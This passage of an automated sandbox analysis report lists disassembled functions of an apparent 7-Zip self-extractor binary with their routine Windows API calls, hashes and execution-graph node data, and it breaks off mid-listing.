                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408842
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408852
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 0040885D
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040886C
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408882
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 004097FF
                                                              • Part of subcall function 004097EB: SetFocus.USER32(00000000,?,00000000,?,00407D6E,?), ref: 00409802
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 00409812
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 0040982A
                                                              • Part of subcall function 004097EB: SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 00409834
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShow
                                                            • String ID:
                                                            • API String ID: 2966018739-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004081C5
                                                            • GetSystemMetrics.USER32(00000031), ref: 004081EB
                                                            • CreateFontIndirectW.GDI32(?), ref: 004081FB
                                                            • DeleteObject.GDI32(00000000), ref: 00408227
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                            • String ID:
                                                            • API String ID: 1900162674-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00418214
                                                              • Part of subcall function 00418161: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00418190
                                                              • Part of subcall function 00418161: ___AdjustPointer.LIBCMT ref: 004181AB
                                                            • _UnwindNestedFrames.LIBCMT ref: 00418229
                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0041823A
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00418262
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                            • String ID:
                                                            • API String ID: 737400349-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ScreenToClient.USER32(?,?), ref: 00409F93
                                                            • GetClientRect.USER32(?,?), ref: 00409FA5
                                                            • PtInRect.USER32(?,?,?), ref: 00409FB4
                                                              • Part of subcall function 00408368: KillTimer.USER32(?,00000001), ref: 00408376
                                                            • CallNextHookEx.USER32(?,?,?), ref: 00409FD6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ClientRect$CallHookKillNextScreenTimer
                                                            • String ID:
                                                            • API String ID: 3015594791-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetObjectW.GDI32(?,0000005C,?), ref: 00409859
                                                            • CreateFontIndirectW.GDI32(?), ref: 0040986F
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00409883
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040988F
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateFontIndirectItemMessageObjectSend
                                                            • String ID:
                                                            • API String ID: 2001801573-0
                                                            • Opcode ID: 39c369573bc1e5b3d8b57993de26fe0e07480bf494ad97b7ed7170ac94c06351
                                                            • Instruction ID: 343021f11795ca5765bd44718630135f581bf7d4d1ad10db3a9c73449ff14822
                                                            • Opcode Fuzzy Hash: 39c369573bc1e5b3d8b57993de26fe0e07480bf494ad97b7ed7170ac94c06351
                                                            • Instruction Fuzzy Hash: 72F0BE76A00704ABDB306BA4DD0DF8B7FAC9F44B11F454039BE01B22D5EBB4E8058A28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,00422D19,?,00000001,?,00000001,?,00421D77,00000020,?,00000001), ref: 00423B3D
                                                            • GetLastError.KERNEL32(?,00422D19,?,00000001,?,00000001,?,00421D77,00000020,?,00000001,00000020,00000001,?,004222F6,00000008), ref: 00423B49
                                                              • Part of subcall function 00423B0F: CloseHandle.KERNEL32(FFFFFFFE,00423B59,?,00422D19,?,00000001,?,00000001,?,00421D77,00000020,?,00000001,00000020,00000001), ref: 00423B1F
                                                            • ___initconout.LIBCMT ref: 00423B59
                                                              • Part of subcall function 00423AD1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00423B00,00422CFF,00000001,?,00421D77,00000020,?,00000001,00000020), ref: 00423AE4
                                                            • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,00422D19,?,00000001,?,00000001,?,00421D77,00000020,?,00000001,00000020), ref: 00423B6E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                            • String ID:
                                                            • API String ID: 2744216297-0
                                                            • Opcode ID: a944fb99e7b2b374bd4570eb33053cbf68d372fdd3fd1b807fb5878d0aba8dcf
                                                            • Instruction ID: 6e3417803b54ef101afe954cc20647d008ba39fcdc3d0f8361be9411dcc04981
                                                            • Opcode Fuzzy Hash: a944fb99e7b2b374bd4570eb33053cbf68d372fdd3fd1b807fb5878d0aba8dcf
                                                            • Instruction Fuzzy Hash: 30F03737240168BBCF221FD1EC0499A3F75FB09361F414061FD1885132C636A920DB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetParent.USER32(?), ref: 00404081
                                                            • GetWindowRect.USER32(?,?), ref: 00404095
                                                            • ScreenToClient.USER32(00000000,?), ref: 0040409D
                                                            • ScreenToClient.USER32(00000000,?), ref: 004040A8
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ClientScreen$ParentRectWindow
                                                            • String ID:
                                                            • API String ID: 2099118873-0
                                                            • Opcode ID: 242cb847b908aef7fe0f63a76772a1eb7179347912ee3f5dfa59614ea61c8f81
                                                            • Instruction ID: 1bb9de8deef0c4eadeb51bb58cda059a22e74be80e731539d07777f5163e87d7
                                                            • Opcode Fuzzy Hash: 242cb847b908aef7fe0f63a76772a1eb7179347912ee3f5dfa59614ea61c8f81
                                                            • Instruction Fuzzy Hash: 84E04F72200249BFDB209FA2EC8CC6B7BADFF893553454035FE05D2121C731D8028BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _free.LIBCMT ref: 0041C959
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 0041C96C
                                                            • _free.LIBCMT ref: 0041C97D
                                                            • _free.LIBCMT ref: 0041C98E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: a63f5945b69e72ce60f23a0b7b4e1b51cb5caed925be45391033b220c94745b5
                                                            • Instruction ID: b3ff374741030e2cef21a52ca44da37e9b0fc9d48e3f3c4c1dc2118c6cae4885
                                                            • Opcode Fuzzy Hash: a63f5945b69e72ce60f23a0b7b4e1b51cb5caed925be45391033b220c94745b5
                                                            • Instruction Fuzzy Hash: 0DE0B6B1800220BA96167F26BC4148BBEE2FB58717305643BF86116635C77D07D2AF9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _free.LIBCMT ref: 0041FB80
                                                            • _free.LIBCMT ref: 0041FBAC
                                                              • Part of subcall function 0041BA0A: IsProcessorFeaturePresent.KERNEL32(00000017,0041D506,?,0000000A,00000001,?,?,00404368), ref: 0041B9E2
                                                              • Part of subcall function 0041CF16: IsProcessorFeaturePresent.KERNEL32(00000017,0041CF05,00000001,0041A92A,0041B0BD,00000000,00000000,00000000,?,?,0041CF12,00000000,00000000,00000000,00000000,00000000), ref: 0041CF18
                                                              • Part of subcall function 0041CF16: GetCurrentProcess.KERNEL32(C0000417,0041A92A,00000001,00426DB8,?,0000000A,00000001,?,?,00404368), ref: 0041CF3B
                                                              • Part of subcall function 0041CF16: TerminateProcess.KERNEL32(00000000,?,0000000A,00000001,?,?,00404368), ref: 0041CF42
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
                                                            • String ID: (3k
                                                            • API String ID: 1729132349-3876852650
                                                            • Opcode ID: 4f7c3d3ca1c805a6a33291a6ecc9934ee780860f4912c396687456ca3d590639
                                                            • Instruction ID: 4e0fb4f926529e79f4a7d6dde1df51a0bf0b4c0fa37cc1f96978be7dd00a29df
                                                            • Opcode Fuzzy Hash: 4f7c3d3ca1c805a6a33291a6ecc9934ee780860f4912c396687456ca3d590639
                                                            • Instruction Fuzzy Hash: CB2149B2A082029FDB149F64D851BE6B3A9EF50315F24007BF804C7285E779E987C65C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00407E7F: GetSystemMetrics.USER32(0000000B), ref: 00407EA9
                                                              • Part of subcall function 00407E7F: GetSystemMetrics.USER32(0000000C), ref: 00407EB0
                                                            • GetSystemMetrics.USER32(00000007), ref: 00407FA9
                                                            • GetSystemMetrics.USER32(00000007), ref: 00407FBA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem
                                                            • String ID: 100%%
                                                            • API String ID: 4116985748-568723177
                                                            • Opcode ID: 93db61c100534800ce29d993e9fe797df588032f6be8180189ff29f6aa40ef41
                                                            • Instruction ID: ce87771dc589547d15901bcf166d76b72ecb80b91b45d889f4387b3e1310f4ab
                                                            • Opcode Fuzzy Hash: 93db61c100534800ce29d993e9fe797df588032f6be8180189ff29f6aa40ef41
                                                            • Instruction Fuzzy Hash: EF318371A003059FCB20DF65DA429AABBF4EF50708F01052EE582B22D1DB74FD48CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `3C$l3C
                                                            • API String ID: 0-4265917238
                                                            • Opcode ID: d20e29b7d094c91299eec6aafbd5e6c7172bc504832a2672b6fcd718cb3214f2
                                                            • Instruction ID: 6356b1a915ef8860ba695889b97caffd8aa89e3941321954ee050adec02bd90d
                                                            • Opcode Fuzzy Hash: d20e29b7d094c91299eec6aafbd5e6c7172bc504832a2672b6fcd718cb3214f2
                                                            • Instruction Fuzzy Hash: 30110E32D006946ADF11EF7C98513DF77A45F06365F14806BEC10EB281DBB89E858B9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Itemwsprintf
                                                            • String ID: (%d%s)
                                                            • API String ID: 449186261-2087557067
                                                            • Opcode ID: 191b2b2badaf5088db7bd9791588117387bc847f1eeb21283be27793c54b44f5
                                                            • Instruction ID: 961ef12b7f81373e4d7e448de88036decbecb2740a9fdb84b0f6dffdc42473d0
                                                            • Opcode Fuzzy Hash: 191b2b2badaf5088db7bd9791588117387bc847f1eeb21283be27793c54b44f5
                                                            • Instruction Fuzzy Hash: BCF06D71900219BFCF10BBA5DC46ECE77BC9F04308F50446EF611A11A2DB75AA58CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00407C4C: KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407C87
                                                              • Part of subcall function 00407C4C: GetSystemMetrics.USER32(00000011), ref: 00407C99
                                                            • IsWindow.USER32 ref: 00409E4D
                                                            • IsBadReadPtr.KERNEL32(00000078), ref: 00409E5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherMetricsReadSystemUserWindow
                                                            • String ID: L~B
                                                            • API String ID: 388239213-2947537266
                                                            • Opcode ID: 27696cd1a3baece273c014428d0ea7c9a6b16cad877120aed2b7f3b1661639b5
                                                            • Instruction ID: ce81054f34517ac8cb1c1b6af2c4e9e9ba25342e94a81ed38c10c3427d1e6252
                                                            • Opcode Fuzzy Hash: 27696cd1a3baece273c014428d0ea7c9a6b16cad877120aed2b7f3b1661639b5
                                                            • Instruction Fuzzy Hash: C5F0CD30A44245AAEB24EBF1DD56B997B70BB1070DF00503AE601652F6DBB95848CB6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00408522: IsWindow.USER32(00000000), ref: 0040852B
                                                            • CreateThread.KERNEL32(00000000,00000000,00409F06,\}B,00000000,00000000), ref: 00409CD8
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00409D01
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CreateItemThreadWindow
                                                            • String ID: \}B
                                                            • API String ID: 1005160481-2560895425
                                                            • Opcode ID: 6d645a3ad78bdec778684f09af2879a306885051c8aa3b18d38ab2f617f61e2a
                                                            • Instruction ID: 938b772c0cf9f24596c8b3d0d952870e7f8d12035a54c5ee2c90f44a47b3bbf4
                                                            • Opcode Fuzzy Hash: 6d645a3ad78bdec778684f09af2879a306885051c8aa3b18d38ab2f617f61e2a
                                                            • Instruction Fuzzy Hash: 3FE0D8B12402207BE92037267D1BEBB3A4DDB44760700013FB906E11D3CFB84C41956C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: DialogWindow
                                                            • String ID: ExecuteOnLoad
                                                            • API String ID: 2634769047-2703198497
                                                            • Opcode ID: ef7443b5fa8d86cee527d923d5d084d8659be588db9ef38a580634f9b905b377
                                                            • Instruction ID: ee3438a96e93673946ee09edf32420b0340fb94c0ae55f0afe696ebeb359c8d8
                                                            • Opcode Fuzzy Hash: ef7443b5fa8d86cee527d923d5d084d8659be588db9ef38a580634f9b905b377
                                                            • Instruction Fuzzy Hash: 45C08030300210DFD7305B20FD097427E94EF00700F01807DB445D11B0DB719C019A54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 004066C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: 7-Zip SFX$Could not allocate memory
                                                            • API String ID: 2030045667-3806377612
                                                            • Opcode ID: 47e90567e423e06cff3ef49a42f6aa0890174b6994cf300e2ecb470e6fd6ac96
                                                            • Instruction ID: 01943cf8c3f835da64c8d14df7b5580dbb2e751ba1447031187b58d6241af338
                                                            • Opcode Fuzzy Hash: 47e90567e423e06cff3ef49a42f6aa0890174b6994cf300e2ecb470e6fd6ac96
                                                            • Instruction Fuzzy Hash: 40B012303D931021E11093302C0BF1E1440170CF12FD104917201A80C1C6D41150100C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:3.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:1.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:47
105778->105779 105780 95f9f2 CharLowerBuffW 105779->105780 105783 95fa05 105780->105783 105781 95fa0f ___scrt_fastfail 105781->105777 105782 95fa43 105785 95fa55 105782->105785 105811 8f53e8 105782->105811 105783->105781 105783->105782 105784 8f53e8 8 API calls 105783->105784 105784->105783 105786 91015b 8 API calls 105785->105786 105788 95fa83 105786->105788 105789 95faa5 105788->105789 105814 95f917 8 API calls 105788->105814 105796 95fb36 105789->105796 105792 95fae2 105792->105781 105793 91012b 8 API calls 105792->105793 105794 95fafc 105793->105794 105797 8fae03 8 API calls 105796->105797 105798 95fb68 105797->105798 105799 8fae03 8 API calls 105798->105799 105800 95fb71 105799->105800 105801 8fae03 8 API calls 105800->105801 105808 95fb7a 105801->105808 105802 8f7467 8 API calls 105802->105808 105803 8f9c50 8 API calls 105803->105808 105804 9166d8 GetStringTypeW 105804->105808 105806 916621 39 API calls 105806->105808 105807 95fb36 40 API calls 105807->105808 105808->105802 105808->105803 105808->105804 105808->105806 105808->105807 105809 95fe3e 105808->105809 105810 8fad69 8 API calls 105808->105810 105815 916702 GetStringTypeW _strftime 105808->105815 105809->105792 105810->105808 105812 8fb159 8 API calls 105811->105812 105813 8f53f3 105812->105813 105813->105785 105814->105788 105815->105808 105817 91015b 8 API calls 105816->105817 105818 8f69e9 105817->105818 105819 91012b 8 API calls 105818->105819 105820 8f69f7 105819->105820 105820->105368 105821 8fb81d 105820->105821 105822 8fb82e 105821->105822 105823 8fb835 105821->105823 105822->105823 105872 916621 39 API calls 105822->105872 105823->105370 105825 8fb878 105825->105370 105826->105378 105827->105396 105829 8fac01 105828->105829 105833 8fabf4 105828->105833 105830 91012b 8 API calls 105829->105830 105833->105428 105835 8f7841 105834->105835 105836 8f77c0 105834->105836 105837 8f8635 8 API calls 105835->105837 105836->105835 105839 8f77cc 105836->105839 105838 8f77de __fread_nolock 105837->105838 
105838->105428 105840 8f77d6 105839->105840 105841 8f7804 105839->105841 105843 8f7851 8 API calls 105840->105843 105842 91012b 8 API calls 105841->105842 105844 8f780e 105842->105844 105843->105838 105845 91015b 8 API calls 105844->105845 105845->105838 105846->105428 105847->105428 105848->105372 105849->105374 105850->105406 105851->105406 105852->105406 105853->105394 105855->105395 105856->105405 105859->105398 105860->105428 105862 93f5a1 105861->105862 105863 8f9c68 105861->105863 105864 91012b 8 API calls 105862->105864 105863->105862 105866 8f9c72 105863->105866 105865 93f5b2 105864->105865 105868 91015b 8 API calls 105865->105868 105867 91015b 8 API calls 105866->105867 105869 8f9c7d __fread_nolock 105866->105869 105867->105869 105868->105869 105869->105427 105870->105425 105871->105429 105872->105825 105905 95ffd4 105873->105905 105876 960135 105879 96019b 105876->105879 105882 960145 105876->105882 105877 96011d 105921 960313 56 API calls __fread_nolock 105877->105921 105880 960231 105879->105880 105881 9601cb 105879->105881 105898 9600c3 __fread_nolock 105879->105898 105885 9602da 105880->105885 105886 96023a 105880->105886 105883 9601d0 105881->105883 105884 9601fb 105881->105884 105887 96017d 105882->105887 105922 96257f 10 API calls 105882->105922 105883->105898 105925 8fb8eb 39 API calls 105883->105925 105884->105898 105926 8fb8eb 39 API calls 105884->105926 105885->105898 105930 8fb4cf 39 API calls 105885->105930 105888 9602b7 105886->105888 105889 96023f 105886->105889 105912 96156e 105887->105912 105888->105898 105929 8fb4cf 39 API calls 105888->105929 105893 960245 105889->105893 105894 96027e 105889->105894 105893->105898 105927 8fb4cf 39 API calls 105893->105927 105894->105898 105928 8fb4cf 39 API calls 105894->105928 105898->105433 105900 960151 105923 96257f 10 API calls 105900->105923 105903 960168 __fread_nolock 105924 96257f 10 API calls 105903->105924 105906 960021 105905->105906 105910 95ffe5 105905->105910 105908 8fb81d 39 API calls 
105906->105908 105907 96001f 105907->105876 105907->105877 105907->105898 105908->105907 105909 8f7e30 52 API calls 105909->105910 105910->105907 105910->105909 105931 914d78 40 API calls 3 library calls 105910->105931 105913 961579 105912->105913 105914 91012b 8 API calls 105913->105914 105915 961580 105914->105915 105916 96158c 105915->105916 105917 9615ad 105915->105917 105918 91015b 8 API calls 105916->105918 105919 91015b 8 API calls 105917->105919 105920 961595 ___scrt_fastfail 105918->105920 105919->105920 105920->105898 105921->105898 105922->105900 105923->105903 105924->105887 105925->105898 105926->105898 105927->105898 105928->105898 105929->105898 105930->105898 105931->105910 105933 8f69c4 8 API calls 105932->105933 105957 8fa425 __fread_nolock 105933->105957 105934 8fa64b 105935 8faa39 8 API calls 105934->105935 105938 8fa665 105935->105938 105938->105444 105940 93fb5d 105947 91012b 8 API calls 105940->105947 105941 8fabe7 8 API calls 105941->105957 105942 93fc84 105996 959d96 83 API calls __wsopen_s 105942->105996 105944 8fa99d 105997 959d96 83 API calls __wsopen_s 105944->105997 105946 8f9c50 8 API calls 105946->105957 105949 93fb7e 105947->105949 105948 93fc92 105950 8faa39 8 API calls 105948->105950 105952 91015b 8 API calls 105949->105952 105951 93fca8 105950->105951 105951->105938 105955 93fbb8 __fread_nolock 105952->105955 105953 8fb159 8 API calls 105956 8fa61c CharUpperBuffW 105953->105956 105955->105944 105956->105957 105957->105934 105957->105940 105957->105941 105957->105942 105957->105944 105957->105946 105957->105953 105957->105955 105958 91015b 8 API calls 105957->105958 105960 8f7eaa 105957->105960 105970 8faa39 105957->105970 105978 8f6b3f 105957->105978 105992 8fab97 105957->105992 105958->105957 105959->105448 105968 8f7ed8 _wcslen 105960->105968 105961 8fabe7 8 API calls 105961->105968 105962 8f8049 105999 8f59dc 105962->105999 105964 8f9c50 8 API calls 105964->105968 105965 8f7f8d 105965->105957 105966 8f7f86 105998 91664b 39 API 
